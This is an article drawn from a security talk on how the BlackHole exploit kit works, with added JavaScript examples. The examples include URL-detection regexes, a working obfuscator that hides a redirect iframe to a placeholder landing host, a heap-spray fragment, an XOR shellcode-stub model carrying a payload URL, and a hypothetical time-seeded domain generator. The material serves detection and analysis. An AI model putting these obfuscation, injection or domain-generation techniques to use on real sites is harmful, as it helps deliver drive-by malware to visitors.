
The State of Web Exploit Toolkits 3: How BlackHole Works

In this part, Jason Jones covers some of BlackHole's specific features: its predictable URL structure, its JavaScript and PDF obfuscation, its XOR-encoded JavaScript shellcode, and its recently added pseudo-random domain generation.

BlackHole’s typical features


Now I’ll actually get a little bit more into how it works. Running all these things through our sandbox, we’ve looked a lot at the URLs it uses and the redirects to where it loads its payloads. We actually found it’s quite predictable, at the moment at least. A lot of times it’s a PHP file; it’s normally showthread.php or main.php. It normally has one URL parameter, and a lot of times it’s actually ‘page=’ followed by a 16-character hex string. So it’s something that’s very detectable; I can look at a URL and say: “I’m pretty sure that’s BlackHole”, but it’s also close enough to a normal URL that you get into that spot of “I can’t just stop someone from visiting that because it could be a legitimate page, and I’d end up getting yelled at if I did”. So, once that’s loaded and it ends up redirecting to its malware payload, a lot of times it’s a one-letter PHP file – w.php is what I’ve observed a lot; t.php is another common one.

So, it’s very predictable, but blocking it can easily block a lot of legitimate traffic. You have ‘f’ and ‘e’ as URL parameters, and the values are all within very small ranges – I can tell what you’re doing, but it ends up being very hard to block only that.
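Added example (not from the talk, and not the speaker's tooling): a heuristic matcher for the two URL shapes described above, run over a handful of constructed sample URLs. The regular expressions, the parameter ranges and the sample hosts are assumptions chosen to illustrate the point; the vBulletin-style `showthread.php?t=...` sample shows why a match on the script name alone is not enough.

```javascript
// Added example: classify URLs by the BlackHole landing/payload shapes
// described in the talk. Patterns and sample URLs are constructed here.

// Landing page: showthread.php or main.php with a single page= parameter
// whose value is exactly 16 hex characters.
const LANDING_RE =
  /^https?:\/\/[^/]+\/(?:[\w-]+\/)*(?:showthread|main)\.php\?page=[0-9a-f]{16}$/i;

// Payload fetch: a one-letter PHP file with small-integer f= and e= values
// in either order. "Small" is assumed to mean at most two digits.
const PAYLOAD_RE =
  /^https?:\/\/[^/]+\/[a-z]\.php\?(?:f=\d{1,2}&e=\d{1,2}|e=\d{1,2}&f=\d{1,2})$/i;

function classifyUrl(url) {
  if (LANDING_RE.test(url)) return "landing";
  if (PAYLOAD_RE.test(url)) return "payload";
  return "benign";
}

// Constructed sample traffic. The forum and CDN URLs are the kind of
// legitimate traffic a looser "showthread.php / main.php" rule would hit.
const SAMPLE_URLS = [
  "http://198.51.100.7/showthread.php?page=0123456789abcdef",   // landing
  "http://203.0.113.5/main.php?page=fedcba9876543210",          // landing
  "http://198.51.100.7/w.php?f=3&e=1",                          // payload
  "http://203.0.113.5/t.php?e=0&f=12",                          // payload
  "http://forum.example.com/showthread.php?t=12345",            // real forum
  "http://cdn.example.com/main.php?page=0123456789ABCDEG",      // not hex
  "http://www.example.com/index.php?f=1&e=2",                   // name too long
];

function classifyAll(urls) {
  return urls.map((url) => ({ url, verdict: classifyUrl(url) }));
}

function countVerdicts(urls) {
  const counts = { landing: 0, payload: 0, benign: 0 };
  for (const { verdict } of classifyAll(urls)) counts[verdict] += 1;
  return counts;
}
```

Even with the parameter shape pinned down, `a.php?f=1&e=2` on an unrelated site would still match the payload rule, which is exactly the false-positive trade-off the talk describes; in practice this pattern is better used to raise a score alongside other indicators than to block outright.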

BlackHole-specific JavaScript obfuscation


The JavaScript that BlackHole uses has obfuscation techniques (see left-hand image) that they tweak just a little bit every time, so every time you’re going through the obfuscation, it’s like: I can catch everything you’re doing now, and then they tweak it just a little bit so that now you don’t catch it. They’ll use character separators; they’ll have a text blob in an HTML element or parameter; sometimes they’ll actually just have a giant URL or integers. So they go through that, they pull this out, they’ll actually do a split to turn their text blob into an array of integers, if it’s not already, and they’ll run it through a deobfuscation routine. It normally includes many other common obfuscation techniques, like doing String.fromCharCode, using square brackets with a quoted value to execute a function, like ‘window[“eval”]’, or sometimes they’ll break it up into e+v+al, or they’ll actually even assign one variable to half of it and then another to that plus the other half of it.

So it’s very common stuff that we see a lot. Then the deobfuscation routine, once it actually gets to the point where it’s handling this giant text blob, splits it, does a String.fromCharCode, adds or subtracts an integer, and ends up building a giant string that is normally handed to ‘eval’ in JavaScript. And that actually ends up being a malicious iframe that redirects to their site, and so you end up getting browser and plugin detection, and launching and loading malware.

JavaScript obfuscation on code level


Here’s an actual sample (see right-hand image). On the left you see the deobfuscated JavaScript, on the right you see the obfuscated JavaScript. You see in the left-hand part where it says: “Please wait page is loading” – that’s usually one of the indicators in the deobfuscated JavaScript. It’s like: you just visited a site that’s been affected by BlackHole, and you should probably get your computer scanned. In the bottom right-hand part, you actually see the text blob I was talking about, and this one is a little bit different, in that they use ‘;.’ as the separator between their values. And up there you see a String.fromCharCode; they’re actually doing some math, so you’ll see a ‘floor’ value – they do a ‘floor’, they do a lot of other tricks. It’s like you can open up a web page and look at this and say: “That’s definitely malicious, but how do I stop that before it gets to what’s on the left, where it’s transformed in the browser?” So you stay on your toes, keep on top of everything, and it ends up being a very difficult problem.
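Added example covering the two obfuscation sections above (it is not BlackHole's code and not the sample in the slide): a model of the blob-based scheme the talk describes (‘;.’ separator, integers, `Math.floor`, `String.fromCharCode` with an offset) together with a deobfuscator that performs the same steps but returns the decoded string instead of passing it to `window["e"+"val"]`. The multiplier, the offset, the salting residue and the iframe payload are constructed assumptions, as is the `landing.invalid` host.

```javascript
// Added example: model of BlackHole-style blob obfuscation and a safe
// (non-evaluating) deobfuscator. Parameters below are assumptions.
const DEFAULT_SEP = ";.";  // separator seen in the talk's sample
const KEY = 3;             // multiplier undone with Math.floor (assumed)
const OFFSET = 17;         // added to each char code (assumed)

// Generator side: each char code is offset, scaled by KEY, and salted with a
// residue < KEY so the raw numbers do not line up with ASCII; floor() drops
// the residue again during decoding.
function obfuscate(code, sep = DEFAULT_SEP, key = KEY, offset = OFFSET) {
  const parts = [];
  for (let i = 0; i < code.length; i++) {
    parts.push((code.charCodeAt(i) + offset) * key + (i % key));
  }
  return parts.join(sep);
}

// Analyst side: split -> integers -> Math.floor -> String.fromCharCode.
// The kit's routine would end with window["e"+"val"](result); this one
// returns the string so it can be inspected or scanned instead.
function deobfuscate(blob, sep = DEFAULT_SEP, key = KEY, offset = OFFSET) {
  return blob
    .split(sep)
    .map(Number)
    .map((n) => String.fromCharCode(Math.floor(n / key) - offset))
    .join("");
}

// Constructed payload in the shape the talk describes: the "please wait"
// text plus a hidden 1x1 iframe pointing at a (placeholder) landing page.
const PAYLOAD =
  'document.write("Please wait page is loading...' +
  '<iframe src=\\"http://landing.invalid/main.php?page=0123456789abcdef\\" ' +
  'width=1 height=1 style=\\"visibility:hidden\\"></iframe>");';

// Indicators a scanner can check on the *decoded* output, which is where
// the talk says the recognisable strings finally appear.
function indicators(decoded) {
  return {
    pleaseWait: /please wait page is loading/i.test(decoded),
    hiddenIframe: /<iframe[^>]*(width=1|height=1|visibility:hidden)/i.test(decoded),
    landingUrl: (decoded.match(/https?:\/\/[^"'\s\\]+/) || [null])[0],
  };
}

const BLOB = obfuscate(PAYLOAD);     // digits, ';' and '.' only
const DECODED = deobfuscate(BLOB);   // equals PAYLOAD
```

The blob never contains letters, which is why signature matching on the obfuscated side is so brittle: a different separator, multiplier or offset defeats a static rule, while the decoded string still has the same two tells (the "please wait" text and the hidden iframe).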

PDF obfuscation, in a nutshell


They also do a lot of PDF exploits (see right-hand image), but they use different obfuscation than they use in JavaScript. They do ASCII character replacement in PDFs and turn something like &#00097 into an ‘a’. But they still use either giant text blobs or arrays of @s. And then they’ll also have multiple-character separators like ‘@@@’, but they’ll actually do an ASCII character replacement for the first @ sign, leave the middle @ sign in there, and then do another ASCII character replacement on the last @ sign. So it ends up being very recognizable, but trying to figure out a way to efficiently detect it in an automated fashion becomes the difficult part. Once this gets through the deobfuscation routine, it ends up following very similar patterns to the HTML JavaScript; it ends up having the same purpose.
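Added example (not the kit's code): normalising the numeric character references described above, so that a separator written as `&#00064@&#00064` becomes `@@@` again, and then splitting and decoding the blob. It assumes the references are zero-padded to five decimal digits as in the `&#00097` example; the per-value offset, the sample snippet and the detection threshold are constructed for illustration.

```javascript
// Added example: undo BlackHole-style ASCII character replacement in PDF
// JavaScript and split the restored blob. Assumes 5-digit decimal references.
const NUMERIC_REF_RE = /&#(\d{5});?/g;             // e.g. &#00097 -> "a"
const SEP_ENTITY = "&#00064@&#00064";               // "@@@" with outer @s replaced
const SEP = "@@@";

function decodeNumericRefs(text) {
  // Fixed width avoids swallowing the digits of the next blob value when a
  // reference is not terminated by ';' (e.g. "&#00064103" -> "@103").
  return text.replace(NUMERIC_REF_RE, (_, num) =>
    String.fromCharCode(parseInt(num, 10)));
}

function splitBlob(blob) {
  return decodeNumericRefs(blob).split(SEP).map(Number);
}

// Same final step as the HTML/JS variant: integers minus an offset, then
// String.fromCharCode. The offset value is an assumption.
function decodePdfBlob(blob, offset) {
  return splitBlob(blob).map((n) => String.fromCharCode(n - offset)).join("");
}

// Generator side, used only to build a constructed sample.
function encodePdfBlob(code, offset) {
  return Array.from(code, (ch) => ch.charCodeAt(0) + offset).join(SEP_ENTITY);
}

// Cheap pre-filter: the replaced separator plus a large number of numeric
// references is the "very recognizable" shape the talk mentions.
function looksLikeReplacedBlob(text, minRefs = 20) {
  const refs = (text.match(NUMERIC_REF_RE) || []).length;
  return text.includes(SEP_ENTITY) && refs >= minRefs;
}

// Constructed sample snippet standing in for the PDF's embedded script.
const SAMPLE_JS = 'var hs = unescape("%u0c0c%u0c0c"); while (hs.length < 0x4000) hs += hs;';
const PDF_BLOB = encodePdfBlob(SAMPLE_JS, 5);
const DECODED_PDF_JS = decodePdfBlob(PDF_BLOB, 5);
```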

JavaScript shellcode


All of their JavaScript shellcode (see left-hand image) you can easily find once you deobfuscate it; they don’t make an attempt to hide it. Also, a lot of it exhibits the same behavior and is very easily detectable: you see the ‘JMP / CALL’ patterns you typically see in shellcode. They try to do a little bit of obfuscation where you load it up and don’t see anything that looks decent, like you can run strings on it and you won’t see any URLs. But they actually do a simple XOR at the beginning of their shellcode, and then you end up with good assembly code that you can find a lot of strings in, you can find URLs, you can actually follow the path of execution – how it gains execution. The image at the bottom is actually one of the URLs we found after we deobfuscated this. You run the shellcode through something like libemu, and it’s easily detected, so they’re definitely not on the forefront of evading anything like that.

Deobfuscated and obfuscated shellcode


Here (see right-hand image) is an example. The left side is the deobfuscated and the right side is the obfuscated shellcode. In the right-hand part you can see it’s actually subtracting a negative number to get the number of bytes that it wants to patch, and that number of bytes ends up being positive. Right there it’s doing its XOR loop, and then that part on the right side actually becomes what’s on the left, which ends up being the assembly code where it does a bunch of jumps before it starts executing.
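Added example (constructed; not the shellcode from the slide): the decoder-stub pattern the two sections above describe, modelled in JavaScript so the before/after effect on `strings` is visible without an x86 emulator. A real stub is machine code; here the stored-negative length, the XOR loop and a minimal `strings` are written out. The key, the byte layout, the pseudo-opcode bytes and the `payload.invalid` URL are assumptions.

```javascript
// Added example: XOR-decoder stub model (negated length + single-byte XOR)
// and a strings() scan before and after decoding. All data is constructed.
const XOR_KEY = 0x99; // assumed key; high bit set, so every printable ASCII
                      // byte encodes to >= 0x80 and strings() finds nothing

function xorBytes(bytes, key) {
  return Uint8Array.from(bytes, (b) => b ^ key);
}

// Packer side: 4-byte little-endian *negated* length followed by the XOR'd
// body. Storing -N and computing 0 - (-N) keeps the count positive at run
// time, as the talk observes in the stub; small negative immediates also
// avoid NUL bytes in the stub itself.
function encodeBody(body, key = XOR_KEY) {
  const out = new Uint8Array(4 + body.length);
  new DataView(out.buffer).setInt32(0, -body.length, true);
  out.set(xorBytes(body, key), 4);
  return out;
}

// Stub side: recover the count by negating the stored value, then run the
// XOR loop over exactly that many bytes.
function decodeBody(blob, key = XOR_KEY) {
  const view = new DataView(blob.buffer, blob.byteOffset, blob.byteLength);
  const count = 0 - view.getInt32(0, true);
  if (count < 0 || 4 + count > blob.length) throw new Error("bad length");
  return xorBytes(blob.subarray(4, 4 + count), key);
}

// Minimal strings(1): runs of printable ASCII at least minLen long.
function strings(bytes, minLen = 6) {
  const found = [];
  let run = "";
  for (const b of bytes) {
    if (b >= 0x20 && b <= 0x7e) { run += String.fromCharCode(b); continue; }
    if (run.length >= minLen) found.push(run);
    run = "";
  }
  if (run.length >= minLen) found.push(run);
  return found;
}

// Constructed body: a JMP/CALL (GetPC) pair as the talk describes, then the
// NUL-terminated payload URL the shellcode would fetch. Not real shellcode.
const BODY = Uint8Array.from([
  0xeb, 0x05,                   // jmp short +5
  0xe8, 0xf6, 0xff, 0xff, 0xff, // call -10: pushes an address, then pop it
  ...Array.from("http://payload.invalid/w.php?f=2&e=1\0", (c) => c.charCodeAt(0)),
]);
const ENCODED = encodeBody(BODY);   // strings(ENCODED) -> []
const DECODED = decodeBody(ENCODED); // strings(DECODED)[0] is the URL
```

The check a practitioner actually wants is the last two lines: the URL is invisible to `strings` on the encoded bytes and trivially visible after one pass of the XOR loop, which is why an emulator such as libemu, which simply executes the stub, has no trouble with this.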

Pseudo-random DGA


And recently they implemented a pseudo-random DNS generation algorithm (see left-hand image), and this makes it harder than something like the recent examples of Flashback: everything with Flashback uses the same DNS generation algorithm and connects to the same servers, whereas every instance of BlackHole has slightly different generation algorithms, it changes every twelve hours, and this makes it a lot more difficult to catch every kit. Before, it was like: “Hey, I know – if you bulletproof-host this DNS name, I can block it”. Now it changes every twelve hours for thousands of installs. At the bottom you’ll actually see there’s a call to make frame, which then ends up generating a pseudo-random string. And this one is using DNSstuff.com, which is a free dynamic DNS service.

Then it does a random number generator based on the time, and if it’s less than 12 then it’s 0, otherwise it’s 1, so that’s actually where it’s using two cycles of the DNS name per day. Also, it gets a color out of the string and uses its pseudo-random number generator to grab ten characters, so that it ends up being a color-(10-character string).dnsstuff.com domain name at the end of it. They just recently added this, so they are definitely trying to add more things and keep their position as the most popular kit.
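Added example (hypothetical; it is not BlackHole's actual algorithm, which the talk does not reproduce): a time-seeded generator with the shape described above, seeding on the day and a half-day flag (0 before 12:00, 1 after) so that every install gets two domains per day, picking a color and a ten-character string, and appending the dnsstuff.com suffix. The PRNG, the color list, the alphabet, the seed mixing and the per-install seed constant are all assumptions; the one thing the example demonstrates faithfully is the twelve-hour cycle and how a defender who has recovered an install's seed can pre-compute the next domains to block.

```javascript
// Added example: hypothetical twelve-hour DGA in the shape the talk describes.
// PRNG, colours, alphabet and seeds are assumptions, not the kit's values.
const COLORS = ["red", "blue", "green", "black", "white", "gray"]; // assumed
const ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789";           // assumed
const SUFFIX = "dnsstuff.com";                                     // from the talk
const KIT_SEED = 0x5eed; // per-install constant, so installs differ (assumed)

// Small LCG standing in for the kit's unknown PRNG; the high half of the
// state is used because an LCG's low bits cycle quickly.
function lcg(seed) {
  let s = seed >>> 0;
  return () => {
    s = (Math.imul(s, 1103515245) + 12345) >>> 0;
    return s >>> 16;
  };
}

// Seed = UTC day number * 2 + half-day flag (0 if hour < 12, else 1):
// this is what gives two domains per day.
function cycleSeed(date) {
  const dayNumber = Math.floor(date.getTime() / 86400000);
  const half = date.getUTCHours() < 12 ? 0 : 1;
  return dayNumber * 2 + half;
}

function generateDomain(date, kitSeed = KIT_SEED) {
  const rand = lcg((cycleSeed(date) ^ kitSeed) >>> 0);
  const color = COLORS[rand() % COLORS.length];
  let label = "";
  for (let i = 0; i < 10; i++) label += ALPHABET[rand() % ALPHABET.length];
  return `${color}-${label}.${SUFFIX}`;
}

// Defender side: with the seed recovered from a sample, enumerate the next
// `cycles` half-day domains for a blocklist.
function upcomingDomains(fromDate, cycles, kitSeed = KIT_SEED) {
  const out = [];
  for (let i = 0; i < cycles; i++) {
    const when = new Date(fromDate.getTime() + i * 12 * 3600000);
    out.push(generateDomain(when, kitSeed));
  }
  return out;
}
```

Two properties matter operationally and both follow from the structure alone: any two times inside the same half-day produce the same domain, and a time in the next half-day produces a different one, so a static blocklist goes stale twice a day per install unless the seed is known.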

Read previous: The State of Web Exploit Toolkits 2: BlackHole Kit Scrutinized

Read next: The State of Web Exploit Toolkits 4: Phoenix and Newer Kits
